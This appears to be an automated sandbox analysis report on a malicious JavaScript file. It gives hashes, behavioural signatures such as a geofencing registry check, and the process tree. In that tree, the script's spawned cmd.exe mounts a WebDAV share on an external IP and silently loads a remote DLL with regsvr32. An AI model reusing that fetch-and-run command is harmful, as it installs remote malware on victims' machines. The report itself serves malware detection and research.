Analysis
-
max time kernel
148s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
24/07/2024, 02:29
Static task
static1
Behavioral task
behavioral1
Sample
93c42c5c8c0962601ab50e7b44fb4c24ff1ac55a3bd1f41f75a43b9fa8f760ad.js
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
93c42c5c8c0962601ab50e7b44fb4c24ff1ac55a3bd1f41f75a43b9fa8f760ad.js
Resource
win10v2004-20240709-en
General
-
Target
93c42c5c8c0962601ab50e7b44fb4c24ff1ac55a3bd1f41f75a43b9fa8f760ad.js
-
Size
6KB
-
MD5
9428c0882a9f85b889d42164db286a3b
-
SHA1
815f89edfa939e6355bd316f9ce133a2093320cd
-
SHA256
93c42c5c8c0962601ab50e7b44fb4c24ff1ac55a3bd1f41f75a43b9fa8f760ad
-
SHA512
734530b6340779eae7999b9120c92d693e1678f719b2f47fef2c4436b3614aff401ab4c8c56869c0d1af3c381e3e9b71369ed6222ac404f77dad6f0d8b16c994
-
SSDEEP
48:lWGzokc39UY91U7Ei51RbS7/L9Ou03E36bX3EkLO/G7UeAU+b96df00ZbAkdNs0O:lWGNE9wzSUKAuGOkh00BAkbkh00BEGz
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\Control Panel\International\Geo\Nation wscript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 3432 wrote to memory of 3436 3432 wscript.exe 84 PID 3432 wrote to memory of 3436 3432 wscript.exe 84 PID 3436 wrote to memory of 428 3436 cmd.exe 86 PID 3436 wrote to memory of 428 3436 cmd.exe 86
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\93c42c5c8c0962601ab50e7b44fb4c24ff1ac55a3bd1f41f75a43b9fa8f760ad.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3432 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k net use \\45.9.74.36@8888\davwwwroot\ && regsvr32 /s \\45.9.74.36@8888\davwwwroot\695817988327.dll2⤵
- Suspicious use of WriteProcessMemory
PID:3436 -
C:\Windows\system32\net.exenet use \\45.9.74.36@8888\davwwwroot\3⤵PID:428
-
-